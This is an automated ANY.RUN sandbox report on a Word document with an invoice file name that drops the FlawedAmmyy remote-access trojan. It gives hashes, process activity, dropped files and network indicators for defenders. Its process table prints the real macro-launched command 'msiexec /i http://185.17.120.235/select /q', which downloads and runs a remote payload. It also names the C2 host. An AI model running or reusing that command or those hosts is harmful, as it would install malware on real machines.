analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

송장_00190821.doc

Full analysis: https://app.any.run/tasks/7b857c36-9f67-44a2-807a-b457886cd601
Verdict: Malicious activity
Threats:

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Malware Trends Tracker     >>>
Analysis date: February 19, 2019, 02:20:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
exe-to-msi
loader
rat
flawedammyy
ammyy
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 1, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 20:07:00 2019, Last Saved Time/Date: Mon Feb 18 20:07:00 2019, Number of Pages: 1, Number of Words: 23, Number of Characters: 137, Security: 0
MD5:

93E5AF41B2994E60FE1655994DCC1FC3

SHA1:

0DF9F97D57786EBDC54C95218DE8BB762E32ABBA

SHA256:

32318477E1C624E585C61546FAE2059D2FF8F3732A988E890665C2D81B3651CC

SSDEEP:

768:5pMLELemEgZnQgW5tmhdMgNMVkefr0VTEJ6eSX:5LLemXZQgW5IYgNlPoJ6vX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2712)

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 2712)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3768)

    • Downloads executable files from IP

      • msiexec.exe (PID: 3768)

    • Loads the Task Scheduler COM API

      • MSI96BB.tmp (PID: 3836)

    • Application was dropped or rewritten from another process

      • wsus.exe (PID: 2360)
      • wsus.exe (PID: 3516)

    • Changes the autorun value in the registry

      • MSI96BB.tmp (PID: 3836)

    • Loads the Task Scheduler DLL interface

      • MSI96BB.tmp (PID: 3836)

    • FLAWEDAMMYY was detected

      • wsus.exe (PID: 3516)

    • Connects to CnC server

      • wsus.exe (PID: 3516)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3768)
      • MSI96BB.tmp (PID: 3836)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3768)

    • Creates files in the program directory

      • MSI96BB.tmp (PID: 3836)

    • Starts CMD.EXE for commands execution

      • MSI96BB.tmp (PID: 3836)

    • Creates files in the Windows directory

      • MSI96BB.tmp (PID: 3836)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2712)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2712)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3768)

    • Application was dropped or rewritten from another process

      • MSI96BB.tmp (PID: 3836)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3768)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: 1
Subject: -
Author: 1
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: 1
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:02:18 20:07:00
ModifyDate: 2019:02:18 20:07:00
Pages: 1
Words: 23
Characters: 137
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 159
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: 1
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msi96bb.tmp #FLAWEDAMMYY wsus.exe cmd.exe no specs wsus.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2712"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\송장_00190821.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2436"C:\Windows\System32\msiexec.exe" back=001 error=exit /i http://185.17.120.235/select /q OnLoad="c:\windows\calc.exe" Aciqy=¶µ±VIks1C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3768C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3836"C:\Windows\Installer\MSI96BB.tmp"C:\Windows\Installer\MSI96BB.tmp
msiexec.exe
User:
admin
Company:
IBM Controler' System Security Control
Integrity Level:
MEDIUM
Description:
IBM Controler' System Security Control
Exit code:
0
Version:
2.8.17228.1
3516"C:\ProgramData\Microsofts Help\wsus.exe"C:\ProgramData\Microsofts Help\wsus.exe
MSI96BB.tmp
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Version:
1.18.2.51920
2676"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI96BB.tmp >> NULC:\Windows\system32\cmd.exeMSI96BB.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2360"C:\ProgramData\Microsofts Help\wsus.exe" C:\ProgramData\Microsofts Help\wsus.exetaskeng.exe
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Exit code:
0
Version:
1.18.2.51920
2692"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI96BB.tmp >> NULC:\Windows\system32\cmd.exeMSI96BB.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 265
Read events
824
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR82A3.tmp.cvr
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF6337D2DED9C7BE04.TMP
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF08267DE9896546D2.TMP
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF23C0B6E0B18380D8.TMP
MD5:
SHA256:
3768msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFE5E025B1D1946ED4.TMP
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4D69D9BCBFC324E700A5A4D9E4D60348
SHA256:B0222DC047C29341F9E3DBAF99CE9E18787FBE50A3485DADF3E273D21B6B2E9C
3768msiexec.exeC:\Config.Msi\199487.rbs
MD5:
SHA256:
3768msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFE14CC8026D94DCD1.TMP
MD5:
SHA256:
3768msiexec.exeC:\Windows\Installer\MSI910B.tmpexecutable
MD5:C19F4137DA7C2D9E5A6A26EFE3FC0F9A
SHA256:10987FB8AB8275F9DE9B8F4F1434CAC08D03B659BF69F81FDB5659F7A0253079
3836MSI96BB.tmpC:\ProgramData\Microsofts Help\wsus.exeexecutable
MD5:30B4E109CAAEBAB50007872085E8D208
SHA256:7ECFD68341FE276C17246DC51C5D70EE2C1BBC6801C85201C8A62956C23D872D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3836
MSI96BB.tmp
GET
200
185.17.120.235:80
http://185.17.120.235/dat1.omg
RU
binary
657 Kb
suspicious
3768
msiexec.exe
GET
200
185.17.120.235:80
http://185.17.120.235/select
RU
executable
168 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3836
MSI96BB.tmp
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious
3516
wsus.exe
185.99.133.2:80
Zappie Host LLC
NZ
malicious
3768
msiexec.exe
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3768
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3768
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3516
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT
3516
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] AMMYY RAT
3516
wsus.exe
A Network Trojan was detected
ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin
3516
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin
1 ETPRO signatures available at the full report
Process
Message
MSI96BB.tmp
C:\ProgramData\Microsofts Help\template_8ce330.DATAHASH
MSI96BB.tmp
--End Dowload--
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
송장_00190821.doc